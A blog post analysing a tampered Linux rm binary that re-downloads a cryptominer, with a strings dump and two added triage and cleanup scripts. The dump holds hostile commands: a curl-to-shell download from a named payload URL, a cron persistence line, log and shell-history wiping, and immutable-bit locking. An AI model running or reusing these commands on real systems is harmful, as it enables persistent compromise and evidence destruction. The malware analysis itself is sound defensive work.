Analysis of a tampered rm command

Published 2020-04-11, 2.09k views


A server was found running a cryptominer. After the process was killed, attempts to delete the miner's files failed. Suspecting rm itself, a quick look at the binary confirmed that the command had been replaced. Once a genuine rm was put back in place, deletion worked again and the miner was cleaned up.

MD5 of the tampered rm:

[root@testvm wakuang]# md5sum rm
f3eda9bab1244305d976c4f07b23ce4c  rm

Running strings on the binary reveals embedded shell commands that no genuine rm contains:

ulimit -d unlimited
ulimit -m unlimited
ulimit -s unlimited
ulimit -t unlimited
ulimit -v unlimited
ulimit -u unlimited
ulimit -n 1048000
popen %s error
echo 123 > /etc/velog
/etc/velog
/proc/self/exe
Failed
Error opening file
/usr/bin/wget
wget -P 
 -t 3 -T 20 
/usr/bin/get
get -P 
/usr/bin/curl
curl 
 --connect-timeout 10  --max-time 30 --retry 3 > 
/usr/bin/url
url 
ps -fe|grep 
 |grep -v grep|grep -v defunct
cat 
error in fork:%s
error in exec function:%s
chattr -ia 
chmod 777 
chattr +ia 
rm -f 
setsid() failed (errno = %d)
chdir() failed (errno = %d)
history - c
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
echo > /root/.bash_history
curl -fsSL --connect-timeout 30 --max-time 30 --retry 3 
 | sh
url -fsSL --connect-timeout 30 --max-time 30 --retry 3 
pkill 
chmod 000 
echo 123aaa >> 
cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c 
dmidecode|grep "System Information" -A9
cat /proc/meminfo
free -m
df -h
ifconfig -a
dmidecode -t bios
strings /usr/lib64/libstdc++.so.6|grep GLIBCXX
cat /proc/uptime
cat /proc/version
lspci | grep Ethernet
top -n 1|head -n 5
cat /etc/issue
chattr -ia /var/spool/cron
chattr -ia /var/spool/cron/root
/var/spool/cron/root
echo >> /var/spool/cron/root
echo "*/6 * * * * curl -fsSL 
 | sh > /dev/null 2>&1 " >> '/var/spool/cron/root'
echo "*/6 * * * * url -fsSL 
cat '/var/spool/cron/root' |grep init.sh
init.sh
chmod 644 /var/spool/cron/root
chattr +ia /var/spool/cron/root
chattr +ia /var/spool/cron
chattr +ia /etc/cron.d
/usr/bin/rmm
QsjeVXG9
http://w.lazer-n.com:43768/init.sh
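The checks that led to the conclusion above (hash comparison, a strings scan for commands rm has no business containing, and the immutable attribute the malware sets with chattr +ia) can be scripted so the same triage can be repeated on every other host in the fleet. The script below is an added example and is not code from the original post: it assumes the bad MD5 printed above, takes its indicator list from the strings dump, and emulates `strings -n 4` with tr/grep so it also works on a host where binutils is missing.

```shell
#!/bin/sh
# Added example, not code from the original post: offline triage of a
# suspect coreutils binary such as the tampered rm above.
# Assumptions: BAD_RM_MD5 is the hash printed in the post; the indicator
# list is taken from the strings dump; `strings` may be missing, so
# printable runs are extracted with tr/grep instead.

BAD_RM_MD5="f3eda9bab1244305d976c4f07b23ce4c"

# Strings a genuine rm never contains (all taken from the dump above).
IOC_LIST='chattr +ia
/var/spool/cron/root
curl -fsSL
| sh
echo > /var/log/wtmp
echo > /root/.bash_history
/etc/velog
init.sh'

# Emulate `strings -n 4`: turn every non-printable byte into a newline,
# then keep runs of at least four printable characters.
extract_strings() {
    LC_ALL=C tr -c '[:print:]' '\n' < "$1" | LC_ALL=C grep -E '.{4,}' || true
}

# MD5 of a file, portable across md5sum (Linux) and md5 (BSD/macOS).
file_md5() {
    if command -v md5sum >/dev/null 2>&1; then
        md5sum "$1" | cut -d' ' -f1
    else
        md5 -q "$1"
    fi
}

# Immutable (i) attribute as set by `chattr +ia`; "unknown" where lsattr
# is unavailable or the filesystem does not support attributes.
immutable_state() {
    attrs=$(lsattr -d "$1" 2>/dev/null | cut -d' ' -f1) || attrs=""
    case "$attrs" in
        "")   echo "unknown" ;;
        *i*)  echo "immutable" ;;
        *)    echo "not-immutable" ;;
    esac
}

# Print the number of indicators found in the file (each hit goes to stderr).
count_iocs() {
    hits=0
    strs=$(extract_strings "$1")
    while IFS= read -r ioc; do
        [ -n "$ioc" ] || continue
        if printf '%s\n' "$strs" | grep -qF -- "$ioc"; then
            hits=$((hits + 1))
            echo "  IOC: $ioc" >&2
        fi
    done <<EOF
$IOC_LIST
EOF
    echo "$hits"
}

# Verdict: BAD_HASH for the exact sample, SUSPICIOUS when three or more
# indicators match (a lone hit such as "init.sh" is not enough), else CLEAN.
triage_binary() {
    if [ "$(file_md5 "$1")" = "$BAD_RM_MD5" ]; then
        echo "BAD_HASH"
        return 0
    fi
    n=$(count_iocs "$1")
    if [ "$n" -ge 3 ]; then echo "SUSPICIOUS"; else echo "CLEAN"; fi
}

# Usage: sh triage.sh /bin/rm
if [ -n "$1" ]; then
    echo "$1: md5=$(file_md5 "$1") attr=$(immutable_state "$1") verdict=$(triage_binary "$1")"
fi
```

On an RPM-based host the quickest first check remains `rpm -V coreutils`, which reports a changed size, digest or mtime for /bin/rm; the script above is for the case where the package database itself cannot be trusted or binutils is absent, and the hash comparison only catches this exact sample, so the indicator scan is the part that generalises.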

Every time the fake rm is executed it re-downloads the miner and its scheduled task from the internet (the init.sh URL above). Recovery was to copy rm from a healthy machine over the tampered binary, which restored normal rm behaviour, then to remove the mining script's cron entry and delete every dropped program. Two details in the strings dump matter for that cleanup: the malware sets chattr +ia on /var/spool/cron/root, /var/spool/cron and /etc/cron.d, so those must be unlocked with chattr -ia before the cron entry can be edited, and it empties /var/log/wtmp, /var/log/secure, /var/spool/mail/root and /root/.bash_history, so any timeline built from this host's logs has to be treated as incomplete. The path /usr/bin/rmm that appears in the dump is also worth inspecting.
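The recovery steps above, as an added example that is not the post's own procedure: it assumes a genuine rm has already been copied from a trusted host of the same distribution, that the cron marker `init.sh` and the artifact paths /usr/bin/rmm and /etc/velog are the ones from the strings dump, and that every artifact may carry the immutable bit the dump shows the malware setting, so each write is preceded by an unlock. The order matters: rm is restored first, with mv and cp only, because until then rm is exactly the binary that cannot be trusted.

```shell
#!/bin/sh
# Added example, not the post's own procedure: remediation helper for the
# tampered-rm case.  Assumptions: a genuine rm has already been copied from
# a trusted host (its path is passed as $1 to restore_rm); the cron marker
# "init.sh" and the artifact paths come from the strings dump above.
# Because the dump shows the malware setting chattr +ia on everything it
# touches, every write is preceded by an unlock.

# Clear immutable/append-only bits; ignore hosts or filesystems without chattr.
unlock() {
    for f in "$@"; do
        chattr -ia "$f" 2>/dev/null || true
    done
}

# Move the tampered rm into a quarantine directory for later analysis and
# install the clean copy in its place.  Uses mv/cp only, never rm.
restore_rm() {
    clean="$1"; target="$2"; quarantine="$3"
    unlock "$(dirname "$target")" "$target"
    mkdir -p "$quarantine"
    mv "$target" "$quarantine/rm.$(date +%Y%m%d%H%M%S)"
    cp "$clean" "$target"
    chmod 755 "$target"
}

# Drop every crontab line carrying the persistence marker and keep the rest.
# grep -v exits 1 when no line survives, hence the || true.
clean_crontab() {
    cron="$1"; marker="$2"
    [ -f "$cron" ] || return 0
    unlock "$(dirname "$cron")" "$cron"
    tmp="$cron.clean.$$"
    grep -vF -- "$marker" "$cron" > "$tmp" || true
    mv "$tmp" "$cron"
    chmod 600 "$cron"
}

# Delete the remaining dropper artifacts with the (now restored) rm.
remove_artifacts() {
    for f in "$@"; do
        [ -e "$f" ] || continue
        unlock "$f"
        rm -f "$f"
    done
}

# Read-only report of what still references the marker: running processes
# and every cron location the dump shows being locked with chattr +ia.
show_remaining() {
    marker="$1"
    pgrep -af -- "$marker" 2>/dev/null || true
    grep -rlF -- "$marker" /var/spool/cron /etc/cron.d /etc/crontab 2>/dev/null || true
}

# Usage on the infected host (clean rm copied beforehand; paths are assumptions):
#   restore_rm /root/rm.clean /bin/rm /root/quarantine
#   clean_crontab /var/spool/cron/root init.sh
#   remove_artifacts /usr/bin/rmm /etc/velog
#   pkill -f init.sh        # then confirm nothing is left with: show_remaining init.sh
```

After the cron entry is gone, re-run `show_remaining` a few minutes later: the dump shows the job firing every six minutes (`*/6 * * * *`), so a reappearing line means a second persistence mechanism is still in place, and the wiped logs mean the host should be rebuilt rather than trusted once the evidence has been collected.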

Articles on this site are shared under the BY-NA-SA 4.0 international license;
unless otherwise noted, all articles on this site are original; please attribute properly when reposting.


scanz personal blog